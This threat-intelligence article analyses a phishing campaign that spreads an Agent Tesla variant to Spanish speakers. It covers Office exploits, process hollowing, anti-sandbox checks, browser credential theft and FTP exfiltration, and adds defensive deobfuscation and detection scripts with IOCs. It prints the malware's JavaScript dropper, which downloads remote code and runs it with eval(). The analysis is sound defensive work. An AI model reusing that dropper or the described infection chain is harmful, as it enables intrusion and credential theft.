Porqué a Mi? (Why Me)

Our friends at FortiGuard Labs recently captured a new phishing campaign that spreads a new Agent Tesla variant, specifically targeting Spanish-speaking people.  Agent Tesla is a well-known .NET-based Remote Access Trojan (RAT) designed to stealthily infiltrate victims’ computers and steal their sensitive information, such as hardware information, login user information, keystrokes, email contacts, web browser cookie files, system clipboard data, screenshots, and basic details like login user name, computer name, OS, CPU and RAM information, as well as credentials saved in widely installed software.

FortiGuard’s in-depth research on this campaign shows that it also leverages multiple techniques to deliver the Agent Tesla core module, such as known MS Office vulnerabilities, JavaScript code, PowerShell code, fileless modules, and more, to protect itself from analysis by security researchers.

The analysis below shows how the campaign works to load Agent Tesla onto a victim’s computer, how it starts, what sensitive data it is able to collect, and the way it sends stolen data to the attacker.

The Phishing Email

Figure 1 – The phishing email.

The phishing email in this screenshot is written in Spanish.  Translated into English, the message reads:

Good day

Attached is proof of payment made to your account according to your client's instructions.

The phishing email, shown in Figure 1, looks like a standard SWIFT transfer notification from a large financial institution. It includes a disguised Excel attachment (transferencia_swift_87647574684.xla) for the victim.

As you may have noticed, the FortiClient service marked the phishing email with “[virus detected]” to warn the user about the attached Excel document.

The Excel Document

The Excel document is in OLE format with crafted embedded data that exploits the CVE-2017-0199 vulnerability. It contains an embedded OLE hyperlink, which is opened automatically once the victim opens the Excel document. The hyperlink provided in the document is “hxxp[:]//ilang[.]in/QqBbmc,” as shown in Figure 2.

Figure 2 – Embedded OLE hyperlink to an online RTF document.

Once the victim opens the Excel file, it automatically downloads an RTF document, which is then opened by Word.  Figure 3 shows the traffic and how the URL downloads the RTF document.

Figure 3 – The equation content inside the RTF document.

CVE-2017-11882 is Exploited

CVE-2017-11882 is an RCE (Remote Code Execution) vulnerability in Microsoft Office’s Equation Editor component (EQNEDT32.EXE). It can be exploited through Excel, Word, PowerPoint, and RTF documents as long as they contain crafted equation data in an OLE object.  Successfully exploiting this vulnerability allows an attacker to execute arbitrary code on a victim's computer.  This buffer overflow vulnerability overwrites a return address on the stack of EQNEDT32.EXE.  The attacker can then hijack the process to jump to and execute the malicious code copied onto the stack.

Figure 4 – Crafted equation data.

Figure 4 shows the crafted equation data extracted from the downloaded RTF document.  The data marked in red is a constant address in EQNEDT32.EXE that overwrites a return address on the stack when the buffer overflow occurs.  Once the shellcode executes, it downloads JavaScript code from a website and runs it on the victim’s computer.  In Figure 5, the shellcode is about to call the API URLDownloadToFileW() to download the JavaScript file from “hxxp[:]//equalizerrr[.]duckdns.org/eveningdatingforeveryone.js” to the local file “C:\Users\Bobs\AppData\Roaming\morningdatingroses.js.”

Figure 5 – Shellcode to download a JavaScript file to local.

It then calls the API ShellExecuteW() to execute the JavaScript file (Windows launches WScript.exe to run the JS file). Finally, it exits the process by calling the API ExitProcess().

JavaScript File Leads to Executing PowerShell Code

Below is a code snippet of the JavaScript file.  It is very clear that it downloads another file from “hxxps[:]//paste[.]ee/d/yWWXG” and then executes the downloaded content by passing it to the eval() function.

morningdatingroses.js:

var paparicos = new ActiveXObject("MSXML2.XMLHTTP");
// The URL is stored reversed to defeat simple string matching;
// reversed, it reads hxxps[:]//paste[.]ee/d/yWWXG.
var alijar = "GXWWy/d/ee.etsap//:sptth".split("").reverse().join("");
paparicos.open("GET", alijar, false);   // synchronous download of the next stage
paparicos.send();

var vomitar = "";
if (paparicos.status === 200) {
    vomitar = paparicos.responseText;
}

// The downloaded text (JavaScript carrying base64-encoded PowerShell) is run directly via eval().
function estarostia(piguancha) {
    eval(piguancha);
}

estarostia(vomitar);

Figure 6 – Base64 encoded PowerShell code.

When the URL is opened in a web browser, the content looks like normal JavaScript code, but it contains a piece of malicious code with base64-encoded PowerShell. This code is decoded, combined with other code (shown below), and executed inside a “powershell.exe” process, as you can see in Figure 6.
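The reversed-string trick in morningdatingroses.js above is a common, cheap obfuscation: the URL never appears forward in the file, so a naive string search misses it. The following Python helper is an added example (not part of the FortiGuard analysis or the malware) that finds every `"literal".split("").reverse().join("")` expression in a script, recovers the plaintext, rewrites the script with the plain literal, and defangs any recovered URL in the same hxxp/[.] style as the IOC list below. The sample script embedded in it is a constructed stand-in with the same structure as the real one, with a placeholder URL; it assumes the obfuscated literal contains no quote or backslash characters.

```python
import re

# Matches  "<literal>".split("").reverse().join("")  with either quote style.
# Group 1 / 3 / 4 are the quote characters (back-referenced so they must match);
# the named group 'lit' is the reversed text. Assumes the literal has no quotes/backslashes.
REVERSED_LITERAL = re.compile(
    r"""(["'])(?P<lit>[^"'\\]*)\1\s*\.split\(\s*(["'])\3\s*\)\s*\.reverse\(\)\s*\.join\(\s*(["'])\4\s*\)"""
)


def find_reversed_strings(js: str) -> list:
    """Return the decoded plaintext of every reversed string literal, in file order."""
    return [m.group("lit")[::-1] for m in REVERSED_LITERAL.finditer(js)]


def deobfuscate(js: str) -> str:
    """Rewrite each reversed-literal expression as the equivalent plain string literal."""
    return REVERSED_LITERAL.sub(lambda m: '"' + m.group("lit")[::-1] + '"', js)


def defang(url: str) -> str:
    """Render a URL unclickable using the hxxp / [:] / [.] convention used in the IOC list."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        return url.replace(".", "[.]")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "[:]//" + host.replace(".", "[.]") + slash + path


# Constructed stand-in for the dropper script: same structure, placeholder URL.
SAMPLE_JS = """
var paparicos = new ActiveXObject("MSXML2.XMLHTTP");
var alijar = "1TSET/d/elpmaxe.etsap//:sptth".split("").reverse().join("");
paparicos.open("GET", alijar, false);
paparicos.send();
var extra = 'gnirts'.split('').reverse().join('');
"""

if __name__ == "__main__":
    for s in find_reversed_strings(SAMPLE_JS):
        print("recovered:", defang(s) if "://" in s else s)
    print(deobfuscate(SAMPLE_JS))
```

Run it over a saved copy of a suspicious .js file instead of `SAMPLE_JS` to list the recovered strings without ever executing the script; the rewritten output is what you would feed into the next stage of static analysis.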

The PowerShell code does the following:

  • Downloads a standard jpg file with a base64-encoded .NET module (the loader-module) appended to it.  The URL of the jpg file is a constant string: “hxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778”.
  • Extracts the loader-module from the jpg file, base64 decodes it, and loads it into PowerShell’s memory.
  • Calls the loader-module’s VAI() method under the namespace PROJETOAUTOMACAO.VB and the class Home.

Please refer to Figure 7 for more information about the PowerShell code.

Figure 7 – The base64 decoded PowerShell code.
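Hiding a base64-encoded .NET module behind an ordinary jpg, as the PowerShell stage above does, works because image viewers and many content filters stop reading at the JPEG end-of-image marker. The Python below is an added example (not code from the FortiGuard analysis or from the campaign) of the carving step an analyst performs on such a file: locate the last EOI marker, base64-decode whatever trails it, and check for a PE/.NET header. It assumes the payload is appended as plain base64 after the marker; the exact delimiter the real PowerShell uses is not shown on the page, and the sample image and "module" bytes are constructed stand-ins, not the campaign's files.

```python
import base64
import binascii
import re
from typing import Optional

# JPEG end-of-image marker. A well-formed image ends here, so any trailing
# bytes are a candidate for a smuggled payload.
JPEG_EOI = b"\xff\xd9"
MIN_B64_LEN = 64  # anything shorter cannot hold a .NET module


def carve_appended_payload(data: bytes) -> Optional[bytes]:
    """Return the base64-decoded bytes appended after the last JPEG EOI marker, or None."""
    eoi = data.rfind(JPEG_EOI)
    if eoi == -1:
        return None
    trailer = data[eoi + len(JPEG_EOI):]
    # Keep only base64 alphabet characters; droppers often add newlines or junk around the blob.
    b64 = re.sub(rb"[^A-Za-z0-9+/=]", b"", trailer)
    if len(b64) < MIN_B64_LEN:
        return None
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_pe(blob: bytes) -> bool:
    """A PE/.NET module starts with the 'MZ' DOS header and has 'PE\\0\\0' at offset e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed stand-in for the appended loader-module: a minimal DOS header whose
# e_lfanew (offset 0x3C) points at a PE signature at 0x40. Not a real binary.
FAKE_MODULE = b"MZ" + b"\x00" * (0x3C - 2) + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 60

# Constructed stand-in for js.jpg: a tiny JFIF header, some image bytes, the EOI marker,
# then the base64 module on its own line, mimicking the layout described above.
SAMPLE_JPG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x01" * 32 + JPEG_EOI
    + b"\r\n" + base64.b64encode(FAKE_MODULE) + b"\r\n"
)

if __name__ == "__main__":
    payload = carve_appended_payload(SAMPLE_JPG)
    size = 0 if payload is None else len(payload)
    print("carved bytes:", size, "| PE header present:", looks_like_pe(payload or b""))
```

Point `carve_appended_payload` at the raw bytes of a downloaded image and, if it returns an `MZ`-prefixed blob, hand that blob to your .NET decompiler rather than the PowerShell that would have loaded it into memory.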

The loader module is a fileless module that is never saved to the local disk. This makes it difficult for a researcher to notice unless performing a step-by-step, in-depth analysis.  The first argument to the method VAI() is a reversed URL to the Agent Tesla core module, which is “hxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt.” The second argument is a switch. If it’s “1,” the module establishes persistence on the victim’s computer by adding itself to the auto-run group in the system’s registry. In this case, it’s “desativado,” so it won’t establish persistence.

The penultimate argument is a process name for this variant: “AddInProcess32.”

A Look into the Loader Module

The loader module running in a PowerShell process downloads a file from the URL passed by the first argument and keeps it in memory. This is the Agent Tesla core module, as shown in Figure 8.

Figure 8 – Loader-module downloads Agent Tesla executable.

Afterward, it starts the “AddInProcess32” process in a suspended state by calling the API CreateProcessA() with creation flags of 0x80000004 (CREATE_SUSPENDED).  Next, the loader-module performs process hollowing: it copies the Agent Tesla executable into that process and executes it within “AddInProcess32.exe.”  To do this, it calls APIs such as GetThreadContext(), VirtualAllocEx(), WriteProcessMemory(), SetThreadContext(), and ResumeThread().

Figure 9 shows the process tree outlining the complete picture, starting from the Excel document and ending with Agent Tesla running inside “AddInProcess32.exe.”

Figure 9 – Process tree of the relevant processes.

Agent Tesla Executable Module

This variant of Agent Tesla is a 32-bit .NET framework program that is obfuscated and runs as a fileless module.  Figure 10 shows a debugger that breaks Agent Tesla at the EntryPoint method, where the namespaces, classes, methods, and code flow are all obfuscated.

Figure 10 – Obfuscated Agent Tesla executable in a debugger.

A special method aims to detect whether it is running in an analysis environment. It performs the following detections:

  • It calls the Windows API CheckRemoteDebuggerPresent() to determine if it’s debugged.
  • Agent Tesla calculates the difference between two tick counts before and after sleeping for ten milliseconds to detect whether it is being debugged or running in a VM.
  • It checks whether some AV or sandbox-related DLLs are loaded in the current process, such as "SbieDLL.dll" for Sandboxie, "SxIn.dll" for Qihu 360, "Sf2.dll" for Avast, "snxhk.dll" for Sophos Intercept X, and "cmdvrt32.dll" for Comodo.
  • Agent Tesla checks if it’s running in a virtualization environment by executing two WMI queries to retrieve the computer’s hardware information, like “Manufacturer,” “Model,” and “Name” of the video controller. It then matches some keywords, such as “Microsoft corporation,” “VMware,” “VIRTUAL,” “VirtualBox,” and “VBox” within the retrieved hardware information.
  • It visits the URL “hxxp://ip-api[.]com/line/?fields=hosting” and checks if the response is “true.” This allows it to check if it’s running in a host provider or a data center.
  • If any of the above detections returns ‘true,’ it exits the process.

 

Sensitive Information Stolen from the Victim Device

Next is a review of Agent Tesla’s features, such as how this variant collects credentials and email contacts from the victim’s device, the software from which it collects the data, and the basic information of the victim’s device.

  • It steals saved credentials from some web browsers, classified as Chromium-based and Mozilla-based, because they use the same folder structure and files to save the credentials.
  • For Chromium-based browsers, it reads saved credentials from “Login Data” files under the browser’s profile folder. Figure 11 shows that it has just obtained some “Opera Browser” (Chromium-based browser) credentials from its profile files “{browser’s profile path}\Default\Login Data” and “{browser’s profile path}\Login Data.”

Figure 11 – Stolen credentials from Chromium-based browser.

Figure 12 – Stolen credentials from Mozilla-based browser.

Figure 12 shows it has just obtained credentials from a Firefox browser’s profile. This variant will steal credentials from the following web browser list.

Chromium-based Web Browsers:

"Orbitum," "Elements Browser," "Cool Novo," "Sputnik," "360 Browser," "Uran," "Iridium Browser," "Liebao Browser," "Vivaldi," "Chromium," "Sleipnir 6," "Coowon," "Coccoc," "Amigo," "Chedot," "Epic Privacy," "CentBrowser," "Edge Chromium," "Chrome," "Citrio," "Opera Browser," "QIP Surf," "Brave," "Kometa," "Comodo Dragon," "7Star," "Torch Browser," "Yandex Browser."

Mozilla-based Web Browsers:

"Firefox," "CyberFox," "WaterFox," "K-Meleon," "Postbox," "Thunderbird browser," "IceCat," "Flock," "IceDragon," "BlackHawk," "PaleMoon," and "SeaMonkey."

Other than the above web browsers, Agent Tesla continues to look for more saved credentials from a wide range of software, which are categorized below.

Other Web Browsers:

"Falkon Browser," "Flock Browser," "IE/Edge," "QQ Browser," "Safari for Windows," and "UC Browser.”

Email clients:

"Outlook," "Opera Mail," "PocoMail," "The Bat!," "Becky!," "ClawsMail," "FoxMail," "IncrediMail," "eM Client," "Mailbird," "Eudora," and "Windows Mail App."

FTP clients:

"CoreFTP," "Flash FXP," "FTPGetter," "FTP Navigator," "FileZilla," "SmartFTP," "FtpCommander," "WinSCP," and "WS_FTP."

VPN clients:

"NordVPN," "TightVNC," "RealVNC," "UltraVNC," "OpenVPN," and "Private Internet Access."

IM client:

"Discord," "Pidgin," "Trillian," "Psi/Psi+," and "Paltalk."

Others:

"MysqlWorkbench," "DynDns," "Microsoft Credentials," "Internet Downloader Manager," and "JDownloader.”

Agent Tesla can also collect the victim’s email contacts if they use Thunderbird as their email client.  Under the Thunderbird profile folder, there is a file named global-messages-db.sqlite.  It is an SQLite database that stores an index of all messages, including attachments, BCC and CC emails, folder names, and more.  Agent Tesla extracts all contacts (email addresses) from this file.

Figure 13 – Agent Tesla collects contacts from the victim.

Based on my analysis, this variant disabled some features (some switch variables are set to “false” by default), such as the keylogger, the screen logger, the system clipboard logger, and cookies.  Refer to Figure 14 for details.

Figure 14 – Some features are disabled by default.

Agent Tesla also collects information about the victim’s computer, such as the system date and time, login user name, computer name, public IP address, OS full name, CPU information, and RAM capacity.

Submitting Stolen Data to an FTP Server

In the past, we captured many Agent Tesla variants that used HTTP POST and SMTP to submit their stolen data to their C2 server.  This variant uses a new way to submit the data it collects from the victim’s device: the FTP protocol.  The FTP server address and credentials are plaintext strings held in some global variables.

Figure 15 – Submit stolen data via FTP.

Figure 15 is a screenshot of Agent Tesla about to submit credentials stolen from my test machine using the FTP method “STOR.”  The format of the file name on the FTP server is “PW_{User name-Computer name_System Date&Time}.html”; the content is the stolen data in HTML format.  The collected email contacts are in a txt file named “Contacts_Thunderbird.txt_{User name-Computer name_System Date&Time}.txt”. One example on my test machine is “Contacts_Thunderbird.txt_Bobs-BOBS-PC_2024_05_17_17_34_21.txt”. The txt file contains all the email addresses collected from Thunderbird.
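Two of the behaviours described on this page leave network artefacts a defender can alert on: the ip-api.com “hosting” lookup from the anti-analysis section, and FTP STOR uploads whose file names follow the fixed `PW_…html` / `Contacts_Thunderbird.txt_…txt` pattern described just above. The Python below is an added detection example (not part of the FortiGuard analysis) that runs both checks over a handful of constructed log lines. The log format is an assumption of this example (`timestamp src dst proto verb argument`, one event per line); the `PW_` file name is a constructed analogue of the page's pattern, and the contacts file name is the one the page shows.

```python
import re
from typing import List, Tuple

# File names Agent Tesla uses for its FTP uploads, per the analysis above:
#   PW_{User name-Computer name_System Date&Time}.html
#   Contacts_Thunderbird.txt_{User name-Computer name_System Date&Time}.txt
# The timestamp part is YYYY_MM_DD_HH_MM_SS; the user/computer part may contain underscores.
EXFIL_NAME = re.compile(
    r"^(?:PW_|Contacts_Thunderbird\.txt_).+_\d{4}_\d{2}_\d{2}_\d{2}_\d{2}_\d{2}\.(?:html|txt)$"
)

# URL the sample queries to learn whether it is running at a hosting provider / data center.
HOSTING_CHECK = re.compile(r"^https?://ip-api\.com/line/\?fields=hosting$")

# Assumed log layout for this example: timestamp src dst proto verb argument
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<proto>\S+) (?P<verb>\S+) (?P<arg>\S+)$"
)


def is_exfil_name(name: str) -> bool:
    """True if an uploaded file name matches Agent Tesla's PW_/Contacts_Thunderbird naming."""
    return EXFIL_NAME.match(name) is not None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str, str]]:
    """Return (line number, rule name, source host, matched argument) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # malformed or unrelated line; skip rather than guess
        f = m.groupdict()
        if f["proto"] == "ftp" and f["verb"] == "STOR" and is_exfil_name(f["arg"]):
            hits.append((n, "agent_tesla_ftp_exfil", f["src"], f["arg"]))
        elif f["proto"] == "http" and f["verb"] == "GET" and HOSTING_CHECK.match(f["arg"]):
            hits.append((n, "hosting_provider_check", f["src"], f["arg"]))
    return hits


# Constructed sample log: two Agent Tesla uploads, one sandbox-check lookup, two benign events.
SAMPLE_LOG = [
    "2024-05-17T17:34:21Z 10.0.0.5 203.0.113.10 ftp STOR PW_Bobs-BOBS-PC_2024_05_17_17_34_21.html",
    "2024-05-17T17:34:22Z 10.0.0.5 203.0.113.10 ftp STOR Contacts_Thunderbird.txt_Bobs-BOBS-PC_2024_05_17_17_34_21.txt",
    "2024-05-17T17:30:02Z 10.0.0.5 198.51.100.7 http GET http://ip-api.com/line/?fields=hosting",
    "2024-05-17T17:31:00Z 10.0.0.9 203.0.113.10 ftp STOR quarterly_report.pdf",
    "2024-05-17T17:32:00Z 10.0.0.9 198.51.100.8 http GET http://example.com/index.html",
]

if __name__ == "__main__":
    for n, rule, src, arg in scan_log(SAMPLE_LOG):
        print(f"line {n}: {rule} from {src}: {arg}")
```

The hosting check on its own is low severity (legitimate software also queries geolocation APIs), but the same source host producing that lookup shortly before a STOR of a `PW_` file is a strong correlation worth escalating, and the file-name rule is independent of which FTP server the variant is pointed at.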

This analysis demonstrates the entire process of the Agent Tesla campaign targeting Spanish-speaking people.  The flowchart in Figure 16 outlines this complex malicious campaign, detailing the process from the phishing email to the stolen information being submitted to an FTP server.

Figure 16 – The whole process of this Agent Tesla campaign.

The analysis examined how the campaign uses multiple techniques to evade researcher analysis, such as exploiting two Microsoft vulnerabilities carried by Excel and RTF documents, executing JavaScript and PowerShell scripts, and encoding most downloaded files in base64.

Next, the researchers looked at how the fileless loader module is called to download the Agent Tesla executable and run it in a process-hollowed AddInProcess32.exe process.  They then expanded on how Agent Tesla detects whether it’s running in an analysis environment, such as a sandbox or virtual machine, or where AV software such as Avast or Comodo is running.  The functions of this variant and how it behaves on the victim’s device were shown.  It collects saved credentials from over 80 popular software applications and victim email contacts from Thunderbird profile files.  Lastly, the analysis demonstrated how this Agent Tesla variant submits the sensitive data harvested from the victim’s device to an FTP server using the “STOR” method.

IOCs

URLs

hxxps[:]//ilang[.]in/QqBbmc

hxxp[:]//equalizerrr[.]duckdns[.]org/eveningdatingforeveryone.js

hxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt

hxxps[:]//paste[.]ee/d/yWWXG

hxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778

FTP Server List

ftp[.]fosna.net

Relevant Sample SHA-256

[transferencia_swift_87647574684.xla]

8406A1D7A33B3549DD44F551E5A68392F85B5EF9CF8F9F3DB68BD7E02D1EABA7

[RTF document]

208AF8E2754A3E55A64796B29EF3A625D89A357C59C43D0FF4D2D30E20092D74

[The loader-module]

7230CC614270DCA79415B0CF53A666A219BEB4BEED90C85A1AC09F082AEA613B

[Agent Tesla Executable]

A1475A0042FE86E50531BB8B8182F9E27A3A61F204700F42FD26406C3BDEC862

 

This article is shared at no charge and is for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and, yes, an SASE.  For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings

https://register.gotowebinar.com/register/5378972949933166424
